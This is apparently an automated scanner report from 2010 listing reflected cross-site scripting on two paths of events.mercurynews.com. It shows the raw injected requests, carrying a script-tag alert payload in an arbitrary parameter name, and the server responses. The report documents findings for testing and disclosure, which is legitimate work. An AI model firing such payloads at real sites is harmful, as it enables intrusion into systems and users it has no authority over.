1. Cross-site scripting (reflected)
1.1. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]
1.2. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://events.mercurynews |
Path: | / |
GET /?f7869"><script>alert(1)< Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 07 Dec 2010 23:18:08 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.121.222.18 X-Runtime: 55 ETag: "5114aa995ecc7a6ce45 Cache-Control: must-revalidate, private, max-age=0 Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 76949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://events.mercurynews |
Path: | /movies |
GET /movies?a5e1e"><script>alert(1)< Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 07 Dec 2010 23:17:47 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.121.222.18 X-Runtime: 25 ETag: "90336fe349d801a285b Cache-Control: must-revalidate, private, max-age=0 Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 52495 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |